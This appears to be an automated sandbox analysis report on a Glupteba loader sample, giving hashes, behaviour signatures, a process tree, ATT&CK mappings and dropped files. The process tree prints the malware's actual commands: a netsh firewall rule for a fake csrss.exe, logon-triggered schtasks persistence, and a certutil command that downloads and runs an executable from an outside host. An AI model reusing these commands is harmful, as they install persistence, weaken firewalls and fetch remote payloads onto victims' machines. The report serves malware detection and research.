Analysis

  • max time kernel
    150s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    25-07-2022 19:28

General

  • Target

    54621d23240e0d13c89ef7aaaab2fe5316355ac48e86b2af8ce629901328ebb6.exe

  • Size

    4.2MB

  • MD5

    fb0abe71241fb248abb144ee67f01da6

  • SHA1

    952da25176bb0e606609500ea52edcf39fe7aec2

  • SHA256

    54621d23240e0d13c89ef7aaaab2fe5316355ac48e86b2af8ce629901328ebb6

  • SHA512

    6f18aeb13784c17d81c332da607b57e36b4d1da57a20f1f72e11cbfdaf83baafb1d01ffdab7829c68a41bfaef5cdfb6132c0084d4d56c6aa5e08ac6cb7de63f6

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 10 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 8 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\54621d23240e0d13c89ef7aaaab2fe5316355ac48e86b2af8ce629901328ebb6.exe
    "C:\Users\Admin\AppData\Local\Temp\54621d23240e0d13c89ef7aaaab2fe5316355ac48e86b2af8ce629901328ebb6.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1804
    • C:\Users\Admin\AppData\Local\Temp\54621d23240e0d13c89ef7aaaab2fe5316355ac48e86b2af8ce629901328ebb6.exe
      "C:\Users\Admin\AppData\Local\Temp\54621d23240e0d13c89ef7aaaab2fe5316355ac48e86b2af8ce629901328ebb6.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1072
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:1892
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        PID:1964
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1680
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1592
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          PID:2012
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220726155326.log C:\Windows\Logs\CBS\CbsPersist_20220726155326.cab
    1⤵
    • Drops file in Windows directory
    PID:1392

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

4
T1112

Install Root Certificate

1
T1130

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    4.2MB

    MD5

    fb0abe71241fb248abb144ee67f01da6

    SHA1

    952da25176bb0e606609500ea52edcf39fe7aec2

    SHA256

    54621d23240e0d13c89ef7aaaab2fe5316355ac48e86b2af8ce629901328ebb6

    SHA512

    6f18aeb13784c17d81c332da607b57e36b4d1da57a20f1f72e11cbfdaf83baafb1d01ffdab7829c68a41bfaef5cdfb6132c0084d4d56c6aa5e08ac6cb7de63f6

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll
    Filesize

    1.5MB

    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    Filesize

    5.3MB

    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    Filesize

    5.3MB

    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    Filesize

    5.3MB

    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\symsrv.dll
    Filesize

    163KB

    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • \Windows\rss\csrss.exe
    Filesize

    4.2MB

    MD5

    fb0abe71241fb248abb144ee67f01da6

    SHA1

    952da25176bb0e606609500ea52edcf39fe7aec2

    SHA256

    54621d23240e0d13c89ef7aaaab2fe5316355ac48e86b2af8ce629901328ebb6

    SHA512

    6f18aeb13784c17d81c332da607b57e36b4d1da57a20f1f72e11cbfdaf83baafb1d01ffdab7829c68a41bfaef5cdfb6132c0084d4d56c6aa5e08ac6cb7de63f6

  • \Windows\rss\csrss.exe
    Filesize

    4.2MB

    MD5

    fb0abe71241fb248abb144ee67f01da6

    SHA1

    952da25176bb0e606609500ea52edcf39fe7aec2

    SHA256

    54621d23240e0d13c89ef7aaaab2fe5316355ac48e86b2af8ce629901328ebb6

    SHA512

    6f18aeb13784c17d81c332da607b57e36b4d1da57a20f1f72e11cbfdaf83baafb1d01ffdab7829c68a41bfaef5cdfb6132c0084d4d56c6aa5e08ac6cb7de63f6

  • memory/1072-61-0x0000000000000000-mapping.dmp
  • memory/1160-70-0x0000000038750000-0x000000003D33D000-memory.dmp
    Filesize

    75.9MB

  • memory/1160-62-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/1160-60-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/1160-74-0x0000000038750000-0x000000003D33D000-memory.dmp
    Filesize

    75.9MB

  • memory/1160-69-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/1160-71-0x0000000038750000-0x000000003D33D000-memory.dmp
    Filesize

    75.9MB

  • memory/1804-59-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/1804-55-0x0000000005240000-0x00000000055E7000-memory.dmp
    Filesize

    3.7MB

  • memory/1804-56-0x00000000055F0000-0x0000000005CE6000-memory.dmp
    Filesize

    7.0MB

  • memory/1804-54-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/1804-57-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/1804-58-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/1892-63-0x0000000000000000-mapping.dmp
  • memory/1892-64-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp
    Filesize

    8KB

  • memory/1964-78-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/1964-67-0x0000000000000000-mapping.dmp
  • memory/1964-75-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/1964-73-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/1964-72-0x0000000000400000-0x0000000004FED000-memory.dmp
    Filesize

    75.9MB

  • memory/2012-79-0x0000000140000000-0x00000001405E8000-memory.dmp
    Filesize

    5.9MB

  • memory/2012-85-0x0000000140000000-0x00000001405E8000-memory.dmp
    Filesize

    5.9MB